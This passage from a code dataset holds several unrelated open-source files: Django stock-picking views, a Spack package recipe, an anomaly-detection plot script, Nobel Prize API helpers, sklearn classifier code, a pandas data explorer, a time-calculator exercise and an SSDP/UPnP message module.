num_cash = float(each_cash[:-1])\n elif each_cash.endswith('亿'):\n num_cash = float(each_cash[:-1]) * 10 ** 4\n else: # 小于万的净流入/出数据\n num_cash = float(each_cash[:-1]) / 10 ** 4\n if num_cash > 0:\n pos_maincash.append(num_cash)\n else:\n neg_maincash.append(num_cash)\n try:\n diff = sum(pos_maincash) / abs(sum(neg_maincash)) # 净流入占净流出的比例\n except Exception:\n print('division by zero:', k)\n continue\n datas2.append((k, diff))\n\n datas2_sort = sorted(datas2, key=lambda s: s[1])\n datas3 = datas2_sort[:10]\n stock_id = [s[0] for s in datas3]\n\n return stock_id\n\n\n# @cache_page(60 * 15) # 有了session后,貌似不用缓存也很快了,最终不用session也快了.\ndef capital(request):\n visitcount(request)\n # 删除过期数据...\n cdata_dated = CashFlowData.objects.filter(stock_date__lte=day_fixed_before_cdata) # 筛选出过时数据\n cdata_dated.delete() # 删除\n\n context_dict = {}\n\n now = datetime.now() # 获取实时时间\n\n workday = [0, 1, 2, 3, 4]\n if (now.weekday() in workday) and (15 <= now.hour < 17): # 工作日的15:00-17:00之间\n context_dict['time_blank'] = '17点后更新'\n # count_cnew = 0\n else:\n # stock_id_list = ['603016'] # 测试用\n\n index_day = 1 # 最小为1(当前), 2(前一天)\n (*_, tradeday_0) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day]\n\n stock_id_list = c_control_strategy2(index_day + 1)\n stock_id_list_yes = c_control_strategy2(index_day + 2)\n # stock_id_list = c_middle_strategy(index_day + 0)\n # stock_id_list_yes = c_middle_strategy(index_day + 1)\n context_dict['trade_day'] = tradeday_0\n\n # stock_id = capital_session3(request) # session函数\n # stock_id_list = stock_id[1]\n # stock_id_list_yes = stock_id[0] # 前一天,用来回测数据\n # count_cnew = stock_id[2] # 从session函数返回的count_new,记录stock_id_now与stock_id_new是否相等的状态\n\n stocks_yes = stock_yes_test(stock_id_list_yes, index_day) # 前一天选择的股票进行测试\n\n if 
stocks_yes:\n context_dict['stocks_yes'] = stocks_yes[0]\n context_dict['average_var'] = stocks_yes[1]\n context_dict['average_count'] = stocks_yes[2]\n context_dict['stocks'] = ChangeToEchartsData_cdata(stock_id_list)\n\n response = render(request, 'choose_stock/capital.html', context_dict)\n # expire_day = cookie_expire_time(17) # 每天的16时为cookie的更新时间\n # response.set_cookie('count_cnew', count_cnew, expires=expire_day)\n # response.set_cookie('count_cnew', count_cnew, max_age=60 * 10) # 设置cookie过期时间为10分钟\n\n return response\n\n\n# ---------------------------个股讯息--------------------------------------\ndef search(request):\n visitcount(request)\n context = {}\n if request.method == 'POST':\n id_name = request.POST['id_name'] # 对应模板中input的name值\n stock_id_name = Name_Id.objects.all().values_list('stock_id', 'stock_name') # 取得所有的股票代码及名称\n special_stock = [s for s in stock_id_name if id_name in s]\n if special_stock:\n return redirect('choose_stock.views.stock_detail', stock_id=special_stock[0][0]) # 必须加上return\n else:\n context['info'] = '无此股票讯息,请重新输入'\n return render(request, 'choose_stock/search.html', context)\n\n\ndef stock_detail(request, stock_id):\n visitcount(request)\n context = {}\n stock_id1 = [stock_id]\n try:\n context['stock_c'] = ChangeToEchartsData_cdata(stock_id1)[0]\n context['stock_k'] = ChangeToEchartsData_kdata(stock_id1)[0]\n stock_name = Name_Id.objects.filter(stock_id=stock_id).values_list('stock_name', flat=True)[0]\n context['news'] = News.objects.filter(content__contains=stock_name).order_by('-published_time')\n except Exception as e:\n print('read stock information error:', e, stock_id)\n return render(request, 'choose_stock/stock_detail.html', context)\n\n\n# -----------------------------访客统计--------------------------------\ndef visitcount(request):\n ip_address = request.META['REMOTE_ADDR']\n visit_time = datetime.now()\n visit_page = request.path\n visit_device = request.META['HTTP_USER_AGENT']\n VisitData.objects.create(ip_address=ip_address, visit_time=visit_time, visit_page=visit_page,\n visit_device=visit_device) # 保存数据\n\n\ndef visitdata(request):\n visits_dated = VisitData.objects.filter(visit_time__lte=day_fixed_before_visit) # 筛选出过时数据\n visits_dated.delete() # 删除\n\n context_dict = {}\n visits_today = VisitData.objects.filter(visit_time__day=now.day).order_by('-visit_time') # 昨日访客\n visits_yes = VisitData.objects.filter(visit_time__day=yesterday.day).order_by('-visit_time') # 今日访客\n context_dict['visits_today'] = visits_today\n context_dict['visits_yes'] = visits_yes\n return render(request, 'choose_stock/visitdata.html', context_dict)\n\n# 待办事项:\n# 1.优化k线图的选股策略:当日主力资金净流入大于0,主力净流入从高到低排序,观察历史数据------基本成功------\n# 2.添加session,保存上一日选择的股票------基本成功------\n# 3.修改删除到期股票的方法,尝试用总数控制的方式--不成功\n# 4.优化资金流选股策略:结合主力是否控盘,观察历史数据\n# 5.改变网络的前端布局,目前太丑了\n# 6.每个新闻页增加相关历史消息\n# 7.结合情感分析,优化利好/利空消息的选择\n# 8.网站访问统计\n# 9.K线图停盘数据优化------成功------\n# 10.股票的超链接优化------成功------\n# 11.回测表格的手机端优化\n# 12.搜索页优化,不要单独放一个页面\n# 13.股票昨日与今日数据储存优化------成功------\n# 14.探索当日资金净流入的绝对值小于某个小的数(如1500万),但主力参与度较高的股票\n# 15.探索当日股价下跌,但资金净流入的股票;或连续股价下跌,但资金连续净流入的股票.\n# 16.东方财富网资金流界面数据更新经常不及时,考虑换用腾讯股票接口获取资金流数据.\n","repo_name":"sass1s/Choose_Stock","sub_path":"choose_stock/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":70304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39928416337","text":"from spack import *\nimport os\nimport sys\nimport spack\n\nclass Dplasma(Package):\n \"\"\"Distributed Parallel Linear Algebra Software for 
Multicore Architectures\"\"\"\n homepage = \"http://icl.utk.edu/dplasma/\"\n url = \"http://icl.cs.utk.edu/projectsfiles/parsec/pubs/dplasma-1.2.1.tgz\"\n\n version('1.2.1', '8b899ba331926997ea96fbc381e2b6cd')\n version('1.2.0', 'f40c36139b6a1b526d2505d1e0237748')\n version('1.1.0', '72e1eec916be379ddb9dcd45c7a4b593')\n pkg_dir = spack.repo.dirname_for_package_name(\"fake\")\n # fake tarball because we consider it is already installed\n version('exist', '7b878b76545ef9ddb6f2b61d4c4be833',\n url = \"file:\"+join_path(pkg_dir, \"empty.tar.gz\"))\n version('src')\n\n variant('mpi', default=True, description='Enable MPI')\n variant('cuda', default=False, description='Enable CUDA')\n variant('mkl', default=False, description='Use BLAS/LAPACK from the Intel MKL library')\n variant('papi', default=False, description='Enable PAPI')\n\n depends_on(\"cmake\")\n depends_on(\"hwloc\")\n depends_on(\"plasma\")\n depends_on(\"mpi\", when='+mpi')\n depends_on(\"papi\", when='+papi')\n\n def install(self, spec, prefix):\n cmake('.', *std_cmake_args)\n\n make()\n make(\"install\")\n\n # to use the existing version available in the environment: DPLASMA_DIR environment variable must be set\n @when('@exist')\n def install(self, spec, prefix):\n if os.getenv('DPLASMA_DIR'):\n dpalsmaroot=os.environ['DPLASMA_DIR']\n if os.path.isdir(dpalsmaroot):\n os.symlink(dpalsmaroot+\"/include\", prefix.include)\n os.symlink(dpalsmaroot+\"/lib\", prefix.lib)\n else:\n raise RuntimeError(dpalsmaroot+' directory does not exist.'+' Do you really have openmpi installed in '+dpalsmaroot+' ?')\n else:\n raise RuntimeError('DPLASMA_DIR is not set, you must set this environment variable to the installation path of your dpalsma')","repo_name":"gmarait/spack","sub_path":"var/spack/repos/builtin/packages/dplasma/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"36109103134","text":"from numpy import *\nimport math\nimport xlrd\nimport numpy as np\nimport openpyxl\nimport datetime\nimport matplotlib.pyplot as plt\nfrom pylab import *\nimport matplotlib.dates as mdates\nimport mpl_toolkits.axisartist as axisartist\ndef norm_pdf_multivariate(x, mu, sigma):\n size = len(x)\n if size == len(mu) and (size, size) == sigma.shape:\n det = linalg.det(sigma)\n if det == 0:\n raise NameError(\"The covariance matrix can't be singular\")\n\n norm_const = 1.0/ (math.pow((2*pi),float(size)/2) * math.pow(det,1.0/2) )\n x_mu = matrix(x - mu)\n inv = sigma.I \n result = math.pow(math.e, -0.5 * (x_mu * inv * x_mu.T))\n return norm_const * result\n else:\n raise NameError(\"The dimensions of the input don't match\")\n\n#读取清洗后的数据\n\ndatasigma = [];datatimeYes = []\ndata_xsls = xlrd.open_workbook(\"./data/14A17Process.xlsx\") #打开此地址下的exl文档\n#data_xsls = xlrd.open_workbook(\"13ANew.xls\") \nsheet_name = data_xsls.sheets()[0] \ncount_nrows = sheet_name.nrows \nfor i in range(1,count_nrows,10):\n if i < 3000 or (i>250000 and i<300000) or(i>380000 and i<490000) or (i > 760000 and i< 820000):\n #if i < 3000 or (i>260000 and i<290000) or (i > 390000 and i< 480000) or (i>770000 and i<810000):\n #if i < 3000 or (i>50000 and i<100000) or (i > 330000 and i< 350000) or (i>850000 and i<990000):\n pass\n else:\n b = []\n for j in range(9):\n b.append(sheet_name.cell_value(i,j+1))\n datasigma.append(b)\n a = xlrd.xldate_as_tuple(sheet_name.cell_value(i,0),0)\n datatimeYes.append(datetime.datetime(*a))\n\n#生成均值和协方差矩阵\nsigma = 
matrix(cov(array(datasigma).T))\nmean = []\nfor i in range(9):\n l = len(datasigma)\n mean.append(sum(datasigma[j][i]for j in range(l))/l)\nmu = array(mean)\n\ndata = [];datatime = []\ndata_xsls = xlrd.open_workbook(\"./data/14A17Process.xlsx\") #打开此地址下的exl文档\n#data_xsls = xlrd.open_workbook(\"13ANew.xls\") \nsheet_name = data_xsls.sheets()[0] \ncount_nrows = sheet_name.nrows \nfor i in range(380000,405000):\n b = []\n for j in range(9):\n b.append(sheet_name.cell_value(i,j+1))\n data.append(b)\n a = xlrd.xldate_as_tuple(sheet_name.cell_value(i,0),0)\n datatime.append(datetime.datetime(*a))\n\nY = []\nfor i in range(len(data)):\n a = norm_pdf_multivariate(data[i], mu, sigma)\n if a > 1*pow(10,-7):\n a = 1*pow(10,-7)\n Y.append(a)\n\nmpl.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus']=False\nfont1 = {\n'weight' : 'normal',\n'size' : 12,\n}\n\nplt.xlabel('日 期',font1)\nplt.ylabel('多元高斯分布计算得到的P(X)',font1)\nplt.xticks(rotation = 20)\nplt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))\nplt.scatter(datatime,Y,marker='o',s=3,color = 'b',label='P(Xi)')\nZ = [5*pow(10,-8) for i in range(len(Y))]\nplt.plot(datatime,Z,marker='o',markersize=2,color = 'r',label='阈值ε')\nplt.legend()\n#plt.title('14号机组一次风机A2017年处理后运行数据',font1)\nplt.show()\n\n\n\n","repo_name":"Eureke-Ch/failure-warning-of-ower-plant-auxiliary-equipment","sub_path":"figure_yuzhi.py","file_name":"figure_yuzhi.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"21912800297","text":"import requests\n\n\ndef download_prize_data():\n \"\"\"This function download the data as json for further use\"\"\"\n r = requests.get(\"http://api.nobelprize.org/2.1/nobelPrizes\")\n r2 = r.json()\n return r2\n\n\ndef category_prize():\n category = {\"fysik\": \"phy\",\n \"kemi\": \"che\",\n \"litteratur\": \"lit\",\n \"ekonomi\": \"eco\",\n \"fred\": \"pea\",\n \"medicin\": \"med\"}\n return category\n\n\ndef find_winner_by_year_and_category():\n category = category_prize()\n try:\n year = input(f\"Year >\")\n p_category = input(f\"\\033[96mPrize category > \\n\")\n c = category[p_category]\n c = {\"nobelPrizeYear\": int(year), \"nobelPrizeCategory\": c}\n\n res = requests.get(\"http://api.nobelprize.org/2.1/nobelPrizes\", params=c).json()\n\n for p in res[\"nobelPrizes\"]:\n pengar = p[\"prizeAmount\"]\n print(f\"\\033[97m{p['categoryFullName']['se']} prissumma {pengar} SEK\")\n\n winner = p[\"laureates\"]\n for num, m in enumerate(winner, start=1):\n print(f\"[{num}] Namnet på vinnaren är: {m['knownName']['en']}\")\n print(f\"\\033[94mMotivation: \\033[97m{m['motivation']['en']}\")\n except KeyError:\n print(f\"\\033[94mPlease enter a year number and category instead.\\n\")\n\n\ndef find_winners_prize():\n prize_data = download_prize_data()\n for data in prize_data[\"nobelPrizes\"]:\n print(f\"{data['awardYear']} : {data['prizeAmount']}\")\n for f in data[\"laureates\"]:\n portion = f[\"portion\"]\n\n\ndef winners_by_year():\n try:\n year = input(f\"Year >\")\n c = {\"nobelPrizeYear\": int(year)}\n\n res = requests.get(\"http://api.nobelprize.org/2.1/nobelPrizes\", params=c).json()\n prize = res[\"nobelPrizes\"]\n for num, p in enumerate(prize, start=1):\n print(f\"[{num}] {p['category']['en']}\")\n pengar = p[\"prizeAmount\"]\n print(f\"\\033[97m{p['categoryFullName']['se']} prissumma {pengar} SEK\")\n for m in p[\"laureates\"]:\n # print(m[\"knownName\"])\n print(f\"\\033[94mMotivation: 
\\033[97m{m['motivation']['en']}\")\n except KeyError:\n print(f\"\\033[94mPlease enter a year number and category instead.\\n\")\n except ValueError:\n print(f\"\\033[94mPlease enter a year number and category instead.\\n\")\n","repo_name":"Rubaakter/Myrepo","sub_path":"tentamen/tenta_functions.py","file_name":"tenta_functions.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19262079866","text":"# loading libraries\nfrom plot import Plot as Plot \nfrom pathlib import Path\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.metrics import confusion_matrix\n\nclass LearnAlgorithms(object):\n\n def __init__(self, train, test):\n self.X_train = train.images\n self.Y_train = train.labels\n\n self.X_test = test.images\n self.Y_test = test.labels\n\n def knnLearn(self, k, train):\n # instantiate learning model (k = 3)\n knn = KNeighborsClassifier(n_neighbors=k)\n\n if Path('../models/KnnModel.pkl').is_file() and not train:\n self.log(\"Loading KNN Model\")\n knn = joblib.load('../models/KnnModel.pkl')\n else:\n # fitting the model\n self.log(\"Fitting KNN Model\")\n knn.fit(self.X_train, self.Y_train)\n joblib.dump(knn, '../models/KnnModel.pkl')\n # predict the response\n self.log(\"Predicting KNN Tests\")\n pred = knn.predict(self.X_test)\n # evaluate accuracy\n self.log(\"KNN Accuracy Score: {}\".format(accuracy_score(self.Y_test, pred)))\n\n cof_mat = confusion_matrix(self.Y_test, pred)\n return cof_mat\n\n def ldaLearn(self, train):\n clf = LinearDiscriminantAnalysis()\n\n if Path('../models/LdaModel.pkl').is_file() and not train:\n self.log(\"Loading LDA Model\")\n clf = joblib.load('../models/LdaModel.pkl')\n else:\n # fitting the model\n self.log(\"Fitting LDA Model\")\n clf.fit(self.X_train, self.Y_train)\n joblib.dump(clf, '../models/LdaModel.pkl')\n # predict the response\n self.log(\"Predicting LDA Tests\")\n pred = clf.predict(self.X_test)\n # evaluate accuracy\n self.log(\"LDA Accuracy Score: {}\".format(accuracy_score(self.Y_test, pred)))\n\n cof_mat = confusion_matrix(self.Y_test, pred)\n return cof_mat\n\n def log(self, msg):\n print('[Learn] {}'.format(msg))","repo_name":"Skalwalker/NumberRecognition","sub_path":"scripts/learnAlgorithms.py","file_name":"learnAlgorithms.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19602953876","text":"from django.shortcuts import render\n\nfrom app.models import Recipe\n\n\ndef recipe_details(request, pk):\n recipe = Recipe.objects.get(pk=pk)\n ingredients = recipe.ingredients.split(', ')\n context = {\n 'recipe': recipe,\n 'ingredients': ingredients,\n }\n\n return render(request, 'details.html', context)\n","repo_name":"ilievpavel/Recipes","sub_path":"app/views/details.py","file_name":"details.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71532667032","text":"import yaml\nfrom glob import glob\nimport pickle \nimport joblib\nimport os, sys\nfrom pathlib import Path\nfrom datetime import datetime\nfrom tqdm import tqdm\nfrom shutil import copyfile\n\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt \nimport 
seaborn as sns\n\nimport lightgbm as lgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OrdinalEncoder\nfrom modules.tuner import *\n\ndef ordinal_encoding(df_input, encoding_lst, save_dir):\n df = df_input.copy()\n oe = OrdinalEncoder()\n oe.fit(df[encoding_lst])\n np.save(f'{save_dir}encoding.npy', oe)\n print(f'Encoding file saved to: {save_dir}')\n return oe\n\ndef train_model(config, params, evals_result, path, **dataset):\n if config['TRAIN']['optuna']['use']:\n N_TRIALS = config['TRAIN']['optuna']['trials']\n study = optuna.create_study(direction='minimize')\n study.optimize(lambda trial: objective(trial, params, evals_result=evals_result,\n path=path, **dataset), n_trials=N_TRIALS, callbacks=[callback_study])\n params.update(study.best_trial.params)\n model = study.user_attrs['best_model']\n df_loss = study.user_attrs['best_loss']\n \n else:\n train_data = lgb.Dataset(dataset['X_train'],\n label=dataset['y_train'],\n categorical_feature=dataset['CAT_FEATURES'],\n free_raw_data=False)\n valid_data = lgb.Dataset(dataset['X_valid'],\n dataset['y_valid'],\n categorical_feature=dataset['CAT_FEATURES'],\n free_raw_data=False)\n model = lgb.train(params\n ,train_set=train_data\n ,valid_sets=[train_data, valid_data]\n ,valid_names = ['train', 'valid']\n ,evals_result=evals_result\n # ,num_boost_round=5000\n ,early_stopping_rounds=1000\n ,verbose_eval=10\n )\n df_loss = pd.DataFrame({key: evals_result[key][params['metric']] for key in evals_result.keys()})\n \n return params, model, df_loss\n\ndef save_loss(df_loss, path):\n sns.lineplot(data=df_loss, x=df_loss.index, y='train', label='train', color='#5392cd')\n sns.lineplot(data=df_loss, x=df_loss.index, y='valid', label='valid', color='#dd8452')\n plt.title('loss', fontsize=30)\n make_single_directory(f'{path}')\n plt.savefig(f'{path}/loss.png', dpi=300)\n plt.clf()\n df_loss.to_csv(f'{path}/loss.csv', index=False)","repo_name":"hyuntai97/ML_pipeline","sub_path":"modules/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18723272867","text":"import argparse\nimport os\nimport pandas as pd\nimport sys\n\n\nclass DataInput:\n\n def __init__(self, path, dtype, orient=None):\n self.path = path\n self.dtype = dtype\n self.orient = orient\n if self.dtype == \"csv\":\n self.df = pd.read_csv(self.path)\n elif self.dtype == \"tsv\":\n self.df = pd.read_csv(self.path, sep='\\t')\n elif self.dtype == \"json\":\n if self.orient == None:\n sys.exit('Provide \"--orient\" parameter for JSON')\n else:\n self.df = pd.read_json(self.path, orient=self.orient, typ='frame')\n self.columns = list(self.df.columns.values)\n self.length = len(self.df.index)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Explore your data with Pandas!')\n parser.add_argument('path',\n metavar='path',\n type=str,\n help='the path to your input file')\n parser.add_argument(\"-t\", \"--type\",\n choices=[\"csv\", \"json\", \"tsv\"],\n required=True, help=\"Required: the input data type\")\n parser.add_argument(\"-o\", \"--orient\",\n choices=[\"split\", \"records\", \"index\", \"columns\", \"values\", \"table\"],\n required=False, help=\"For JSON: define orientation\")\n\n args = parser.parse_args()\n path = args.path\n\n if not os.path.exists(path):\n print('The path specified does not exist')\n sys.exit()\n dtype = args.type\n orient = args.orient\n\n print(\"Input Data: 
{}\".format(path))\n d = DataInput(path, dtype, orient)\n df = d.df\n columns = d.columns\n length = d.length\n print(\"Your object is 'd' and your df is 'df'.\")\n print(\"Your df length: {}\".format(length))\n print(\"Your df has {} columns.\".format(len(columns)))\n print(\"Your df columns: {}\".format(columns))\n print(\" \")\n print(\"Entering Interaction: (press 'Ctrl-d' to exit)\")\n print(\" \")\n print(\"For example, run: >>> df.head()\")\n print(\" \")\n import code\n code.interact(local=locals())\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"ajp3979/data_interact","sub_path":"data_interact/data_interact.py","file_name":"data_interact.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6951725266","text":"#!/usr/bin/env python3\n\n#\n# Mathieu Marchildon\n#\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport turtle\nfrom turtle import *\n\nfilename = f\"../inputs/day09-input.txt\"\n#filename = f\"../inputs/day09-test-input.txt\"\n\nfile = open(filename, \"r\")\nlines = file.readlines()\nlines[:] = [line.strip().split() for line in lines]\n\n\nx = 0\ny = 0\nhead = [[x, y]]\n\nfor line in lines:\n direction = line[0]\n spaces = int(line[1])\n\n for delta in range(spaces):\n if direction == \"U\":\n y += 1\n elif direction == \"D\":\n y -= 1\n elif direction == \"R\":\n x += 1\n elif direction == \"L\":\n x -= 1\n\n head.append([x, y])\n\n\ndef tail_pos(p1, p2, tail_p):\n px1 = p1[0]\n py1 = p1[1]\n px2 = p2[0]\n py2 = p2[1]\n\n m_delta_x = abs(px2 - px1)\n m_delta_y = abs(py2 - py1)\n\n h_delta_x1 = abs(px1 - tail_p[0])\n h_delta_y1 = abs(py1 - tail_p[1])\n h_delta_x2 = abs(px2 - tail_p[0])\n h_delta_y2 = abs(py2 - tail_p[1])\n\n #print(f\"head moved from {p1} -> {p2}\")\n if m_delta_x == 1 and m_delta_y == 1:\n if h_delta_x2 > 1 or h_delta_y2 > 1:\n #print(\"diagonal move\")\n x_move = px2 - px1\n y_move = py2 - py1\n\n new_t = []\n if h_delta_x2 == 0:\n new_t = [tail_p[0], tail_p[1] + y_move]\n elif h_delta_y2 == 0:\n new_t = [tail_p[0] + x_move, tail_p[1]]\n else:\n new_t = [tail_p[0] + x_move, tail_p[1] + y_move]\n #print(f\"{tail_p=}\")\n #print(f\"{new_t=}\")\n return new_t\n else:\n #print(f\"{tail_p=}\")\n return tail_p\n\n\n if h_delta_x2 > 1:\n #print(f\"head moved away from tail x dir\")\n return [px1, py1]\n elif h_delta_y2 > 1:\n #print(f\"head moved away from tail y dir\")\n return [px1, py1]\n else:\n #print(f\"no move\")\n return tail_p\n\n\ntail = [[0, 0]]\nsnake = [head]\nfor t in range(9):\n # start new tail at same position of the head\n tail = [head[0]]\n\n for i in range(len(head) - 1):\n #print(f\"{tail[i]=}\")\n new_tail = tail_pos(head[i], head[i + 1], tail[i])\n #print(f\"{new_tail=}\")\n tail.append(new_tail)\n\n snake.append(tail)\n head = tail\n\n\n\nnparr = np.array(snake[9])\nunique_tail = np.unique(nparr, axis=0)\nplt.show()\nprint(len(unique_tail))\n","repo_name":"matt-marc/AdventOfCode","sub_path":"2022/day09/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8730700083","text":"def add_time(start, duration, today=None):\r\n time, unit = start.split()\r\n hour_start, minutes_start = time.split(\":\")\r\n hour_duration, minutes_duration = duration.split(\":\")\r\n\r\n hour_start = int(hour_start)\r\n minutes_start = int(minutes_start)\r\n minutes_duration = int(minutes_duration)\r\n hour_duration = 
int(hour_duration)\r\n\r\n    days = [\r\n        \"Monday\",\r\n        \"Tuesday\",\r\n        \"Wednesday\",\r\n        \"Thursday\",\r\n        \"Friday\",\r\n        \"Saturday\",\r\n        \"Sunday\",\r\n    ]\r\n\r\n    num_days = 0\r\n\r\n    minutes_start += minutes_duration\r\n    minutes_duration = 0\r\n    if minutes_start >= 60:\r\n        minutes_start = minutes_start % 60\r\n        hour_start += 1\r\n\r\n    # if only minutes were input\r\n    if hour_duration == 0 and hour_start == 12:\r\n        if unit == \"AM\":\r\n            unit = \"PM\"\r\n        else:\r\n            unit = \"AM\"\r\n            num_days += 1\r\n\r\n    while hour_duration != 0:\r\n        # resolve hours\r\n        hour_start += 1\r\n        hour_duration -= 1\r\n\r\n        if hour_start >= 12:\r\n            hour_start = hour_start % 12\r\n            if unit == \"AM\":\r\n                unit = \"PM\"\r\n            else:\r\n                unit = \"AM\"\r\n                num_days += 1\r\n\r\n        if hour_start == 0:\r\n            hour_start = 12\r\n\r\n    result_day = 0\r\n\r\n    # if today is passed\r\n    if today is not None:\r\n        result_day = days[(days.index(today.capitalize()) + num_days) % 7]\r\n\r\n        # resolve days case\r\n        if num_days == 1:\r\n            return f\"{hour_start}:{minutes_start:02} {unit} (next day)\"\r\n        elif num_days > 1:\r\n            return f\"{hour_start}:{minutes_start:02} {unit}, {result_day} ({num_days} days later)\"\r\n        else:\r\n            return f\"{hour_start}:{minutes_start:02} {unit}, {result_day}\"\r\n    else:\r\n        # resolve days case\r\n        if num_days == 1:\r\n            return f\"{hour_start}:{minutes_start:02} {unit} (next day)\"\r\n        elif num_days > 1:\r\n            return f\"{hour_start}:{minutes_start:02} {unit} ({num_days} days later)\"\r\n        else:\r\n            return f\"{hour_start}:{minutes_start:02} {unit}\"\r\n\r\n\r\nprint(add_time(\"6:30 PM\", \"205:12\"))\r\n","repo_name":"MustafaHashmani/Freecodecamp-Python-Projects","sub_path":"time-calculator.py","file_name":"time-calculator.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"40924846051","text":"'''\r\nCreated on Aug 4, 2013\r\n\r\n@author: Jonathan\r\n'''\r\n\r\nimport time\r\nfrom collections import OrderedDict\r\n\r\nADDRESS = (\"239.255.255.250\", 1900)\r\n\r\ndef initialize(userAgent):\r\n\tglobal USER_AGENT\r\n\tUSER_AGENT = userAgent\r\n\r\ndef getUserAgent():\r\n\tglobal USER_AGENT\r\n\tif \"USER_AGENT\" not in globals():\r\n\t\tUSER_AGENT = \"not/1.0 UPnP/1.1 initialized/2.7\"\r\n\treturn USER_AGENT\r\n\r\nclass Device(object):\r\n\t\r\n\tMAX_BOOT_ID = 2**31 - 1\r\n\tMAX_CONFIG_ID = 2**24 - 1\r\n\t\r\n\tdef __init__(self, uuid, urn, location=None, configId=0, bootId=int(time.time())):\r\n\t\tif not (0 <= int(bootId) <= self.MAX_BOOT_ID): raise ValueError(\"bootId must be between zero and %d\" % self.MAX_BOOT_ID)\r\n\t\tif not (0 <= int(configId) <= self.MAX_CONFIG_ID): raise ValueError(\"configId must be between zero and %d\" % self.MAX_CONFIG_ID)\r\n\t\t\r\n\t\tself._uuid = uuid\r\n\t\tself._urn = urn\r\n\t\tself._configId = int(configId)\r\n\t\tself._bootId = int(bootId)\r\n\t\tself._devices = [] \r\n\t\tself._services = []\r\n\t\tself._location = location\r\n\t\t\r\n\t@property\r\n\tdef uuid(self):\r\n\t\treturn self._uuid\r\n\t\r\n\t@property\r\n\tdef urn(self):\r\n\t\treturn self._urn\r\n\t\r\n\t@property\r\n\tdef configId(self):\r\n\t\treturn self._configId\r\n\t\r\n\t@property\r\n\tdef bootId(self):\r\n\t\treturn self._bootId\r\n\t\r\n\t@property\r\n\tdef devices(self):\r\n\t\treturn self._devices\r\n\t\r\n\t@property\r\n\tdef services(self):\r\n\t\treturn self._services\r\n\t\r\n\t@property\r\n\tdef location(self):\r\n\t\treturn self._location\r\n\t\r\n
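\t# Editor's note (added; illustrative sketch only, all names and values below are hypothetical): a root device is typically built as dev = Device(\"0e2f...-uuid\", \"schemas-upnp-org:device:MediaServer:1\", location=\"http://192.168.0.2/desc.xml\"), populated via dev.addService(Service(\"schemas-upnp-org:service:ContentDirectory:1\")), and then announced with renderAliveMessages(dev, 1800).\r\n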
\tdef updateBootId(self):\r\n\t\tself._bootId = (self._bootId + 1) % (self.MAX_BOOT_ID + 1)\r\n\t\t\r\n\tdef addDevice(self, device):\r\n\t\tself._devices.append(device)\r\n\t\t\r\n\tdef addService(self, service):\r\n\t\tself._services.append(service)\r\n\t\r\nclass Service(object):\r\n\t\r\n\tdef __init__(self, urn):\r\n\t\tself._urn = urn\r\n\t\t\r\n\t@property\r\n\tdef urn(self):\r\n\t\treturn self._urn\r\n\r\ndef formatDate(t):\r\n\treturn time.strftime(\"%a, %d %b %Y %H:%M:%S UTC\", t)\r\n\r\ndef renderMessage(method, headers):\r\n\tHEADER_FORMAT = \"%s: %s\"\r\n\treturn method + \"\\r\\n\" + \"\\r\\n\".join([HEADER_FORMAT % header for header in headers.items()]) + \"\\r\\n\"\r\n\r\ndef parseMessage(message):\r\n\tlines = message.split(\"\\r\\n\")\r\n\theaders = {}\r\n\tfor line in lines[1:]:\r\n\t\tcomponents = line.split(\":\", 1)\r\n\t\tif len(components) == 1:\r\n\t\t\theaders[components[0].strip()] = \"\"\r\n\t\telif len(components) == 2:\r\n\t\t\theaders[components[0].strip()] = components[1].strip()\r\n\treturn lines[0], headers\r\n\r\nNOTIFY_METHOD = \"NOTIFY * HTTP/1.1\"\r\nSEARCH_METHOD = \"M-SEARCH * HTTP/1.1\"\r\nRESPONSE_METHOD = \"HTTP/1.1 200 OK\"\r\n\r\nALIVE_HEADERS = {\"HOST\": \"%s:%d\" % ADDRESS,\r\n\t\t\t\t\"CACHE-CONTROL\": \"\",\r\n\t\t\t\t\"LOCATION\": \"\",\r\n\t\t\t\t\"NT\": \"\",\r\n\t\t\t\t\"NTS\": \"ssdp:alive\",\r\n\t\t\t\t\"SERVER\": \"\",\r\n\t\t\t\t\"USN\": \"\", \r\n\t\t\t\t\"BOOTID.UPNP.ORG\": \"\",\r\n\t\t\t\t\"CONFIGID.UPNP.ORG\": 